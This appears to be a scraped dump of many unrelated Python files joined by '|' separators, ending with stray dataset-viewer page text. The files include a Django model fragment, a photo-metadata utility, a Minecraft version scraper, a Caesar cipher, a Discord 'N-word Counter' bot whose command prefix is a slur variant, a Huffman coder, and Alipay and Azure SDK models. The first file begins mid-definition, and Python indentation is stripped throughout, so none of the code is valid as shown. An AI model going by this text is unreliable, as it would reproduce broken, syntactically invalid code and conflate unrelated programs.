SINGLES = 'S'
DOUBLES = 'D'
MATCH_TYPE = [
(SINGLES, 'Singles'),
(DOUBLES, 'Doubles'),
]
year = models.IntegerField()
division = models.IntegerField(choices=Divisions.choices)
match_type = models.CharField(
max_length=1,
choices=MATCH_TYPE
)
player = models.ForeignKey(Player, on_delete=models.RESTRICT)
def __str__(self):
return f'{self.get_division_display()} {self.get_match_type_display()} {self.player}'
|
import logging
import logging.handlers
import os
import os.path
import exiftool
import numpy as np
import requests
from scipy.spatial import distance
import ownphotos.settings
logger = logging.getLogger("ownphotos")
fomatter = logging.Formatter(
"%(asctime)s : %(filename)s : %(funcName)s : %(lineno)s : %(levelname)s : %(message)s"
)
fileMaxByte = 256 * 1024 * 200 # 100MB
fileHandler = logging.handlers.RotatingFileHandler(
os.path.join(ownphotos.settings.LOGS_ROOT, "ownphotos.log"),
maxBytes=fileMaxByte,
backupCount=10,
)
fileHandler.setFormatter(fomatter)
logger.addHandler(fileHandler)
logger.setLevel(logging.INFO)
def convert_to_degrees(values):
"""
Helper function to convert the GPS coordinates stored in the EXIF to degress in float format
:param value:
:type value: exifread.utils.Ratio
:rtype: float
"""
d = float(values[0].num) / float(values[0].den)
m = float(values[1].num) / float(values[1].den)
s = float(values[2].num) / float(values[2].den)
return d + (m / 60.0) + (s / 3600.0)
weekdays = {
1: "Monday",
2: "Tuesday",
3: "Wednesday",
4: "Thursday",
5: "Friday",
6: "Saturday",
7: "Sunday",
}
def compute_bic(kmeans, X):
"""
Computes the BIC metric for a given clusters
Parameters:
-----------------------------------------
kmeans: List of clustering object from scikit learn
X : multidimension np array of data points
Returns:
-----------------------------------------
BIC value
"""
# assign centers and labels
centers = [kmeans.cluster_centers_]
labels = kmeans.labels_
# number of clusters
m = kmeans.n_clusters
# size of the clusters
n = np.bincount(labels)
# size of data set
N, d = X.shape
# compute variance for all clusters beforehand
cl_var = (1.0 / (N - m) / d) * sum(
[
sum(
distance.cdist(X[np.where(labels == i)], [centers[0][i]], "euclidean")
** 2
)
for i in range(m)
]
)
const_term = 0.5 * m * np.log(N) * (d + 1)
BIC = (
np.sum(
[
n[i] * np.log(n[i])
- n[i] * np.log(N)
- ((n[i] * d) / 2) * np.log(2 * np.pi * cl_var)
- ((n[i] - 1) * d / 2)
for i in range(m)
]
)
- const_term
)
return BIC
def mapbox_reverse_geocode(lat, lon):
mapbox_api_key = os.environ.get("MAPBOX_API_KEY", "")
if mapbox_api_key == "":
return {}
url = (
"https://api.mapbox.com/geocoding/v5/mapbox.places/%f,%f.json?access_token=%s"
% (lon, lat, mapbox_api_key)
)
resp = requests.get(url)
if resp.status_code == 200:
resp_json = resp.json()
search_terms = []
if "features" in resp_json.keys():
for feature in resp_json["features"]:
search_terms.append(feature["text"])
resp_json["search_text"] = " ".join(search_terms)
logger.info("mapbox returned status 200.")
return resp_json
else:
# logger.info('mapbox returned non 200 response.')
logger.warning("mapbox returned status {} response.".format(resp.status_code))
return {}
def get_sidecar_files_in_priority_order(media_file):
"""
Returns a list of possible XMP sidecar files for *media_file*, ordered
by priority.
"""
image_basename = os.path.splitext(media_file)[0]
return [
image_basename + ".xmp",
image_basename + ".XMP",
media_file + ".xmp",
media_file + ".XMP",
]
exiftool_instance = exiftool.ExifTool()
def _get_existing_metadata_files_reversed(media_file, include_sidecar_files):
if include_sidecar_files:
files = [
file
for file in get_sidecar_files_in_priority_order(media_file)
if os.path.exists(file)
]
files.append(media_file)
return list(reversed(files))
return [media_file]
def get_metadata(media_file, tags, try_sidecar=True):
"""
Get values for each metadata tag in *tags* from *media_file*.
If *try_sidecar* is `True`, use the value set in any XMP sidecar file
stored alongside *media_file*.
If *exiftool_instance* is running, leave it running when returning
from this function. Otherwise, start it and then terminate it before
returning.
Returns a list with the value of each tag in *tags* or `None` if the
tag was not found.
"""
et = exiftool_instance
terminate_et = False
if not et.running:
et.start()
terminate_et = True
files_by_reverse_priority = _get_existing_metadata_files_reversed(
media_file, try_sidecar
)
values = []
try:
for tag in tags:
value = None
for file in files_by_reverse_priority:
retrieved_value = et.get_tag(tag, file)
if retrieved_value is not None:
value = retrieved_value
values.append(value)
finally:
if terminate_et:
et.terminate()
return values
def write_metadata(media_file, tags, use_sidecar=True):
et = exiftool_instance
terminate_et = False
if not et.running:
et.start()
terminate_et = True
if use_sidecar:
file_path = get_sidecar_files_in_priority_order(media_file)[0]
else:
file_path = media_file
try:
logger.info(f"Writing {tags} to {file_path}")
params = [os.fsencode(f"-{tag}={value}") for tag, value in tags.items()]
params.append(b"-overwrite_original")
params.append(os.fsencode(file_path))
et.execute(*params)
finally:
if terminate_et:
et.terminate()
|
import urllib.request, urllib.error, urllib.parse
from bs4 import BeautifulSoup
import string
import json
import requests
import calendar
def _getVanilla():
url = "https://launchermeta.mojang.com/mc/game/version_manifest.json"
f = json.loads(requests.get(url).text)
versions = []
for v in f['versions']:
if v['type'] == 'release' and v['releaseTime'] > "2014-03-25":
versions.append({'id': v['id'], 'url': v['url']})
for v in f['versions']:
if v['type'] == 'snapshot' and v['releaseTime'] > "2019-03-25":
versions.append({'id': v['id'], 'url': v['url']})
return versions
def _getCraftBukkit():
versions = []
link = "https://mcmirror.io/api/list/craftbukkit"
f = json.loads(requests.get(link).text)
f.sort()
for version in f:
if not version == 'craftbukkit-latest.jar':
versionSplit = version.split('-')
date = f"{versionSplit[3][:4]}/{versionSplit[3][4:6]}/{versionSplit[3][6:]}"
versionID = versionSplit[1]
else:
date = 'Latest'
versionID = version
if date > "2019/08/01":
versions.append({'id': versionID + f' ({date})',
'url': f'https://mcmirror.io/files/craftbukkit/{version}',
'date': date})
versions = sorted(versions, key=lambda k: k['date'])[::-1]
return versions
def _getPaper():
versions = []
link = "https://yivesmirror.com/api/list/paper"
f = json.loads(requests.get(link).text)
f.sort()
for version in f:
versions.append({'id': version.replace('Paper-', '').strip('.jar'),
'url': f'https://yivesmirror.com/files/paper/{version}'})
return versions[::-1]
def _getSpigotExtra():
versions = []
link = "https://archive.mcmirror.io/Spigot/"
f = requests.get(link).text.split('\n')[4:-3]
for i in f:
if (not 'api' in i) and (not 'spigot-latest' in i):
name = i.split('"')[1].strip('spigot-').strip('.jar')
versions.append({
'id': name,
'url': 'https://archive.mcmirror.io/Spigot/' + i.split('"')[1],
'date': 'Archived'})
versions = sorted(versions, key=lambda k: k['id'])[::-1]
return versions
def _getSpigot():
versions = []
link = "https://mcmirror.io/api/list/spigot"
f = json.loads(requests.get(link).text)
f.sort()
for version in f:
if not version == 'spigot-latest.jar':
versionSplit = version.split('-')
date = f"{versionSplit[3][:4]}/{versionSplit[3][4:6]}/{versionSplit[3][6:]}"
versionID = versionSplit[1]
else:
date = 'Latest'
versionID = version
versions.append({'id': versionID + f' ({date})',
'url': f'https://mcmirror.io/files/spigot/{version}',
'date': date})
versions = sorted(versions, key=lambda k: k['date'])[::-1]
extraVersions = _getSpigotExtra()
for v in extraVersions:
versions.append(v)
return versions
def getVersions():
vanilla = _getVanilla()
craftbukkit = _getCraftBukkit()
spigot = _getSpigot()
papermc = _getPaper()
forge = []
return {'Vanilla': vanilla, 'CraftBukkit': craftbukkit,
'Spigot': spigot, 'PaperMC': papermc, 'Forge': forge}
chars = list(string.ascii_lowercase)
monthabbr = {v: k for k,v in enumerate(calendar.month_abbr)}
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddlespeech.server.engine.engine_factory import EngineFactory
# global value
ENGINE_POOL = {}
def get_engine_pool() -> dict:
""" Get engine pool
"""
global ENGINE_POOL
return ENGINE_POOL
def init_engine_pool(config) -> bool:
""" Init engine pool
"""
global ENGINE_POOL
for engine_and_type in config.engine_list:
engine = engine_and_type.split("_")[0]
engine_type = engine_and_type.split("_")[1]
ENGINE_POOL[engine] = EngineFactory.get_engine(
engine_name=engine, engine_type=engine_type)
if not ENGINE_POOL[engine].init(config=config[engine_and_type]):
return False
return True
|
class Caesar:
def __init__(self, shift):
self.shift = shift
def crypt(self, inputString, decrypt=False):
message = [ord(c) for c in inputString]
result = []
for i in range(len(message)):
if decrypt:
result.append((message[i] - self.shift)%1114111)
else:
result.append((message[i] + self.shift)%1114111)
return ''.join([chr(c) for c in result])
if __name__ == '__main__':
mg = str(input("PLease type the message : "))
shifts = int(input("Choose number of shifts : "))
encrypt = Caesar(shifts)
answer = encrypt.crypt(mg)
print(answer.encode('utf8'))
answer2 = encrypt.crypt(answer, True)
print(answer2.encode('utf8'))
|
# warncheck.py
#
import warnings
import unittest
from sys import version_info
from dicom.test.version_dep import capture_warnings
def assertWarns(self, warn_msg, function, *func_args, **func_kwargs):
"""
Check that the function generates the expected warning
with the arguments given.
warn_msg -- part of the warning string, any warnings should contain this
function -- the function to call (expected to issue a warning)
func_args -- positional arguments to the function
func_kwargs -- keyword arguments to the function
Return the function return value.
"""
result, all_warnings = capture_warnings(function, *func_args,
**func_kwargs)
msg = "Expected one warning; got {0:d}"
self.assertTrue(len(all_warnings) == 1, msg.format(len(all_warnings)))
msg = "Expected warning message '{0:s}...'; got '{1:s}'"
self.assertTrue(warn_msg in all_warnings[0],
msg.format(warn_msg, all_warnings[0]))
return result
def test_warning(the_warning):
if the_warning:
warnings.warn(the_warning)
class WarnTests(unittest.TestCase):
def testWarn(self):
"""Test that assertWarns works as expected"""
assertWarns(self, "Look", test_warning, "Look out")
if __name__ == "__main__":
unittest.main()
|
import time
#This class is a singletion class
#timer: calcualte the time elasepd between each 2 call
#In this project is used to calculte the fps of the video
#or camear, and the fps of captured face frame
class timer():
__instance = None
@staticmethod
def timerInstance():
if timer.__instance == None:
timer()
return timer.__instance
def __init__(self):
if timer.__instance != None:
raise Exception("Timer class is a singleton class")
else:
timer.__instance = self
self.prev_time = 0
self.last_time = 0
self.next_time = 0
self.frame_time = 0
self.time_elapsed = 0
self.start_time = 0
self.last_time_in_time_elapsed = 0
self.current_time = 0
self.started = False
self.time_at_reset = 0
def start(self):
self.started = True
self.time_elapsed = 0
self.last_time = time.time()
self.last_time_in_time_elapsed = self.last_time
self.start_time = self.last_time
self.current_time = self.last_time
self.time_at_reset = self.start_time
def timeElapsed(self):
self.current_time = time.time()
self.time_elapsed = self.current_time - self.last_time_in_time_elapsed
self.last_time_in_time_elapsed = self.current_time
return self.time_elapsed
def timeCounter(self):
return time.time() - self.time_at_reset
def timeCounterReset(self):
self.time_at_reset = time.time()
def timeSinceStart(self):
return time.time() - self.start_time
|
from google.appengine.ext import db
from catnado.properties.key_property import KeyProperty
class UniquePropertyRecordExistsError(Exception):
"""Raise when attempting to create a property that already exists."""
pass
class UniquePropertyRecord(db.Model):
"""Datastore model for keeping particular properties unique.
Creates a key name using a combination of the Kind, Property Name, and Value.
Since get_by_key_name is strongly consistent within a datastore transactional,
one can be certain that no other entity exists with that specific combination
as long as a UniquePropertyRecord is created during the same transaction.
"""
target_key = KeyProperty()
@staticmethod
def make_key_name(kind, property_name, value):
"""Make a Key Name given a kind, property name, and value.
Args:
kind: required str or db.Model subclass
property_name: required str; property name i.e. "email"
value: required value (that can be converted to a string)
Returns:
str to be used as a Key Name
Raises:
ValueError if kind is not a string or db.Model subclass
"""
if isinstance(kind, type) and issubclass(kind, db.Model):
kind = kind.kind()
if not isinstance(kind, basestring):
raise ValueError('kind must be a string or db.Model subclass')
return '{}:{}:{}'.format(kind, property_name, value)
@staticmethod
def create(kind, property_name, value, target_key=None):
"""Create a UniquePropertyRecord.
If called from within a transactional, there is no attempt to verify that
the given combo of key/property_name/value doesn't already exist. It is
assumed that one calling this function from within a transactional is already
verifying that the combo is unique.
Args:
(see make_key_name)
target_key: optional db.Model subclass or key pointing at any entity
transactional: optional bool, whether to create in a transaction (True)
Returns:
newly-created UniquePropertyRecord key or None
Raises:
AssertionError: if value is None and allow_none is False
ValueError: if kind is not a string or db.Model subclass
"""
assert value is not None
called_from_transaction = db.is_in_transaction()
def _create():
if not called_from_transaction:
existing_record = UniquePropertyRecord.retrieve(kind, property_name, value)
if existing_record:
raise UniquePropertyRecordExistsError(existing_record.key().name())
key_name = UniquePropertyRecord.make_key_name(kind, property_name, value)
return UniquePropertyRecord(key_name=key_name, target_key=target_key).put()
if not called_from_transaction:
return db.run_in_transaction(_create)
else:
return _create()
@staticmethod
def retrieve(kind, property_name, value):
"""Find a UniquePropertyRecord, if it exists.
Args:
see create
Returns:
bool; True iff a UniquePropertyRecord exists with the given kind, property
name, and value
"""
key_name = UniquePropertyRecord.make_key_name(kind, property_name, value)
return UniquePropertyRecord.get_by_key_name(key_name)
|
import tempfile
from dffml.record import Record
from dffml.source.source import Sources
from dffml import train, accuracy, predict
from dffml.util.asynctestcase import AsyncTestCase
from dffml.source.memory import MemorySource, MemorySourceConfig
from dffml_model_transformers.qa.qa_model import QAModel, QAModelConfig
from .defaults import CACHE_DIR
class TestQAModel(AsyncTestCase):
@classmethod
def setUpClass(cls):
(A_train, B_train, C_train, X_train, D_train, E_train,) = list(
zip(*TRAIN_DATA)
)
A_test, B_test, C_test, X_test, D_test, E_test = list(zip(*TEST_DATA))
cls.train_records = [
Record(
str(i),
data={
"features": {
"title": A_train[i],
"context": B_train[i],
"question": C_train[i],
"answer_text": X_train[i],
"start_pos_char": D_train[i],
"is_impossible": E_train[i],
"answers": [],
}
},
)
for i in range(len(X_train))
]
cls.test_records = [
Record(
str(i),
data={
"features": {
"title": A_test[i],
"context": B_test[i],
"question": C_test[i],
"answer_text": X_test[i],
"start_pos_char": D_test[i],
"is_impossible": E_test[i],
"answers": [],
}
},
)
for i in range(len(X_test))
]
cls.train_sources = Sources(
MemorySource(MemorySourceConfig(records=cls.train_records))
)
cls.test_sources = Sources(
MemorySource(MemorySourceConfig(records=cls.test_records))
)
cls.model_dir = tempfile.TemporaryDirectory()
cls.model = QAModel(
QAModelConfig(
model_name_or_path="bert-base-cased",
cache_dir=CACHE_DIR,
directory=cls.model_dir.name,
log_dir=cls.model_dir.name,
model_type="bert",
no_cuda=True,
)
)
@classmethod
def tearDownClass(cls):
cls.model_dir.cleanup()
async def test_00_train(self):
await train(self.model, self.train_sources)
async def test_01_accuracy(self):
res = await accuracy(self.model, self.train_sources)
self.assertGreaterEqual(res, 0)
async def test_02_predict(self):
predictions = [
prediction
async for prediction in predict(self.model, self.test_sources)
]
self.assertIn(
isinstance(predictions[0][2]["Answer"]["value"]["0"], str), [True]
)
self.assertIn(
isinstance(predictions[1][2]["Answer"]["value"]["1"], str), [True]
)
# Randomly generate sample data
title = "World War 2"
context = "Second world war lasted from 1939 to 1945. The first belligerent act of war was Germany's attack on Poland. The first two countries to declare war on Germany were Britain and France."
# train_ques_ans_list = [[question, answer_text, start_pos_char, is_impossible]]
train_ques_ans_list = [
[
"How long was the second world war?",
"lasted from 1939 to 1945",
18,
False,
],
[
"Which were the first two countries to declare war on Germany?",
"Britain and France",
164,
False,
],
[
"What was the first act of war?",
"Germany's attack on Poland",
81,
False,
],
]
test_ques_ans_list = [
["How long was the second world war?", " ", 0, False,],
[
"Which were the first two countries to declare war on Germany?",
" ",
0,
False,
],
["What was the first act of war?", " ", 0, False,],
]
TRAIN_DATA = [[title, context, *d] for d in train_ques_ans_list]
TEST_DATA = [[title, context, *d] for d in test_ques_ans_list]
|
"""Main file
N-word Counter bot
"""
import os
from json import load
from pathlib import Path
import discord
from discord.ext import commands
# Fetch bot token.
with Path("../config.json").open() as f:
config = load(f)
TOKEN = config["DISCORD_TOKEN"]
# Me and my alt account(s).
owner_ids = (354783154126716938, 691896247052927006)
bot = commands.Bot(
command_prefix=["nibba ", "n!"],
case_insensitive=True,
intents=discord.Intents.all(),
help_command=commands.MinimalHelpCommand()
) # https://bit.ly/3rJiM2S
@bot.event
async def on_ready():
"""Display successful startup status"""
print(f"{bot.user} connected!")
@bot.command()
async def ping(ctx):
"""Pong back latency"""
await ctx.send(f"_Pong!_ ({round(bot.latency * 1000, 1)} ms)")
@bot.command()
@commands.has_permissions(administrator=True)
async def load(context, extension):
"""(Bot dev only) Load a cog into the bot"""
msg_success = f"File **load** of {extension}.py successful."
msg_fail = "You do not have permission to do this"
if context.author.id in owner_ids:
bot.load_extension(f"cogs.{extension}")
print(msg_success)
await context.send(msg_success)
else:
await context.send(msg_fail)
@bot.command()
@commands.has_permissions(administrator=True)
async def unload(context, extension):
"""(Bot dev only) Unload a cog from the bot"""
msg_success = f"File **unload** of {extension}.py successful."
msg_fail = "You do not have permission to do this"
if context.author.id in owner_ids:
bot.unload_extension(f"cogs.{extension}")
print(msg_success)
await context.send(msg_success)
else:
await context.send(msg_fail)
@bot.command()
@commands.has_permissions(administrator=True)
async def reload(context, extension):
"""(Bot dev only) Reload a cog into the bot"""
msg_success = f"File **reload** of {extension}.py successful."
msg_fail = "You do not have permission to do this"
if context.author.id in owner_ids:
bot.unload_extension(f"cogs.{extension}")
bot.load_extension(f"cogs.{extension}")
print(msg_success)
await context.send(msg_success)
else:
await context.send(msg_fail)
# Load cogs into the bot.
for filename in os.listdir("./cogs"):
if filename.endswith(".py"):
bot.load_extension(f"cogs.{filename[:-3]}")
bot.run(TOKEN)
|
import heapq
from collections import namedtuple
Node = namedtuple('Node', ('weight','index'))
def read_file(name):
"""Given the path/name of the text file, return the heap with nodes.
"""
tree = []
file = open(name, 'r')
data = file.readlines()
for index, line in enumerate(data[1:]):
item = line.split()
tree.append(Node(int(item[0]), str(index)))
heapq.heapify(tree)
return tree
def combine(a,b):
"""Combine two nodes into a single one.
"""
return Node(a.weight+b.weight, '+'.join([a.index, b.index]))
def huffman(tree):
"""Given the initial tree, return the length of each node.
"""
code_len = [0]*len(tree)
while(len(tree)>1):
# Pop two min items
a = heapq.heappop(tree)
b = heapq.heappop(tree)
# Reinsert the combined item
new_node = combine(a,b)
heapq.heappush(tree, new_node)
#heapq.heappush(tree,combine(a,b))
# add 1 to the code length for a,b
com = [int(item) for item in new_node.index.split('+')]
for i in com:
code_len[i] += 1
return code_len
def main():
tree = read_file('huffman.txt')
codes = huffman(tree)
print(max(codes), min(codes))
if __name__ == '__main__':
main()
### Test case
a = Node(3,'0')
b = Node(2,'1')
c = Node(6,'2')
d = Node(8,'3')
e = Node(2,'4')
f = Node(6,'5')
tree = [a,b,c,d,e,f]
heapq.heapify(tree)
len_code = huffman(tree)
print(len_code)
|
from typing import Optional, List
from rlai.actions import Action
from rlai.meta import rl_text
@rl_text(chapter='States', page=1)
class State:
"""
State.
"""
def is_feasible(
self,
a: Action
) -> bool:
"""
Check whether an action is feasible from the current state. This uses a set-based lookup with O(1) complexity,
which is far faster than checking for the action in self.AA.
:param a: Action.
:return: True if the action is feasible from the current state and False otherwise.
"""
return a in self.AA_set
def __init__(
self,
i: Optional[int],
AA: List[Action]
):
"""
Initialize the state.
:param i: Identifier for the state.
:param AA: All actions that can be taken from this state.
"""
self.i = i
self.AA = AA
# use set for fast existence checks (e.g., in `feasible` function)
self.AA_set = set(self.AA)
def __str__(
self
) -> str:
"""
Get string description of state.
:return: String.
"""
return f'State {self.i}'
def __hash__(
self
) -> int:
"""
Get hash code for state.
:return: Hash code
"""
return self.i
def __eq__(
self,
other: object
) -> bool:
"""
Check whether the current state equals another.
:param other: Other state.
:return: True if equal and False otherwise.
"""
if not isinstance(other, State):
raise ValueError(f'Expected {State}')
return self.i == other.i
def __ne__(
self,
other: object
) -> bool:
"""
Check whether the current state is not equal to another.
:param other: Other state.
:return: True if not equal and False otherwise.
"""
return not (self == other)
|
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Show GMN status information.
The information is the same that is available under /home in the Web UI. Output is in JSON.
"""
import d1_common.types.exceptions
import d1_common.xml
import d1_gmn.app.did
import d1_gmn.app.mgmt_base
import d1_gmn.app.models
class Command(d1_gmn.app.mgmt_base.GMNCommandBase):
def __init__(self, *args, **kwargs):
super().__init__(__doc__, __name__, *args, **kwargs)
def add_arguments(self, parser):
# self.add_arg_force(parser)
pass
def handle_serial(self):
pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class UnfreezeOrderDetail(object):
def __init__(self):
self._alipay_order_no = None
self._create_time = None
self._memo = None
self._merchant_order_no = None
self._modified_time = None
self._order_amount = None
self._order_status = None
self._unfreeze_amount = None
@property
def alipay_order_no(self):
return self._alipay_order_no
@alipay_order_no.setter
def alipay_order_no(self, value):
self._alipay_order_no = value
@property
def create_time(self):
return self._create_time
@create_time.setter
def create_time(self, value):
self._create_time = value
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def merchant_order_no(self):
return self._merchant_order_no
@merchant_order_no.setter
def merchant_order_no(self, value):
self._merchant_order_no = value
@property
def modified_time(self):
return self._modified_time
@modified_time.setter
def modified_time(self, value):
self._modified_time = value
@property
def order_amount(self):
return self._order_amount
@order_amount.setter
def order_amount(self, value):
self._order_amount = value
@property
def order_status(self):
return self._order_status
@order_status.setter
def order_status(self, value):
self._order_status = value
@property
def unfreeze_amount(self):
return self._unfreeze_amount
@unfreeze_amount.setter
def unfreeze_amount(self, value):
self._unfreeze_amount = value
def to_alipay_dict(self):
params = dict()
if self.alipay_order_no:
if hasattr(self.alipay_order_no, 'to_alipay_dict'):
params['alipay_order_no'] = self.alipay_order_no.to_alipay_dict()
else:
params['alipay_order_no'] = self.alipay_order_no
if self.create_time:
if hasattr(self.create_time, 'to_alipay_dict'):
params['create_time'] = self.create_time.to_alipay_dict()
else:
params['create_time'] = self.create_time
if self.memo:
if hasattr(self.memo, 'to_alipay_dict'):
params['memo'] = self.memo.to_alipay_dict()
else:
params['memo'] = self.memo
if self.merchant_order_no:
if hasattr(self.merchant_order_no, 'to_alipay_dict'):
params['merchant_order_no'] = self.merchant_order_no.to_alipay_dict()
else:
params['merchant_order_no'] = self.merchant_order_no
if self.modified_time:
if hasattr(self.modified_time, 'to_alipay_dict'):
params['modified_time'] = self.modified_time.to_alipay_dict()
else:
params['modified_time'] = self.modified_time
if self.order_amount:
if hasattr(self.order_amount, 'to_alipay_dict'):
params['order_amount'] = self.order_amount.to_alipay_dict()
else:
params['order_amount'] = self.order_amount
if self.order_status:
if hasattr(self.order_status, 'to_alipay_dict'):
params['order_status'] = self.order_status.to_alipay_dict()
else:
params['order_status'] = self.order_status
if self.unfreeze_amount:
if hasattr(self.unfreeze_amount, 'to_alipay_dict'):
params['unfreeze_amount'] = self.unfreeze_amount.to_alipay_dict()
else:
params['unfreeze_amount'] = self.unfreeze_amount
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = UnfreezeOrderDetail()
if 'alipay_order_no' in d:
o.alipay_order_no = d['alipay_order_no']
if 'create_time' in d:
o.create_time = d['create_time']
if 'memo' in d:
o.memo = d['memo']
if 'merchant_order_no' in d:
o.merchant_order_no = d['merchant_order_no']
if 'modified_time' in d:
o.modified_time = d['modified_time']
if 'order_amount' in d:
o.order_amount = d['order_amount']
if 'order_status' in d:
o.order_status = d['order_status']
if 'unfreeze_amount' in d:
o.unfreeze_amount = d['unfreeze_amount']
return o
|
import langbrainscore
import xarray as xr
from langbrainscore.interface.encoder import _Encoder
class BrainEncoder(_Encoder):
"""
This class is used to extract the relevant contents of a given
`langbrainscore.dataset.Dataset` object and maintains the Encoder interface.
"""
def __init__(self) -> "BrainEncoder":
pass
def encode(
self, dataset: langbrainscore.dataset.Dataset, average_time: bool = False,
) -> xr.DataArray:
"""
returns human measurements related to stimuli (passed in as a Dataset)
Args:
langbrainscore.dataset.Dataset: brain dataset object
Returns:
xr.DataArray: contents of brain dataset
"""
self._check_dataset_interface(dataset)
if average_time:
dim = "timeid"
return (
dataset.contents.mean(dim)
.expand_dims(dim, 2)
.assign_coords({dim: (dim, [0])})
)
return dataset.contents
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class ErrorResponse(msrest.serialization.Model):
"""Error response indicates Insights service is not able to process the incoming request. The reason is provided in the error message.
:param code: Error code.
:type code: str
:param message: Error message indicating why the operation failed.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class LiveTokenResponse(msrest.serialization.Model):
"""The response to a live token query.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar live_token: JWT token for accessing live metrics stream data.
:vartype live_token: str
"""
_validation = {
'live_token': {'readonly': True},
}
_attribute_map = {
'live_token': {'key': 'liveToken', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LiveTokenResponse, self).__init__(**kwargs)
self.live_token = None
class OperationInfo(msrest.serialization.Model):
"""Information about an operation.
:param provider: Name of the provider.
:type provider: str
:param resource: Name of the resource type.
:type resource: str
:param operation: Name of the operation.
:type operation: str
:param description: Description of the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationInfo, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class OperationLive(msrest.serialization.Model):
"""Represents an operation returned by the GetOperations request.
:param name: Name of the operation.
:type name: str
:param display: Display name of the operation.
:type display: ~azure.mgmt.applicationinsights.v2020_06_02_preview.models.OperationInfo
:param origin: Origin of the operation.
:type origin: str
:param properties: Properties of the operation.
:type properties: object
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationInfo'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(
self,
**kwargs
):
super(OperationLive, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
class OperationsListResult(msrest.serialization.Model):
"""Result of the List Operations operation.
:param value: A collection of operations.
:type value: list[~azure.mgmt.applicationinsights.v2020_06_02_preview.models.OperationLive]
:param next_link: URL to get the next set of operation list results if there are any.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[OperationLive]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationsListResult, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.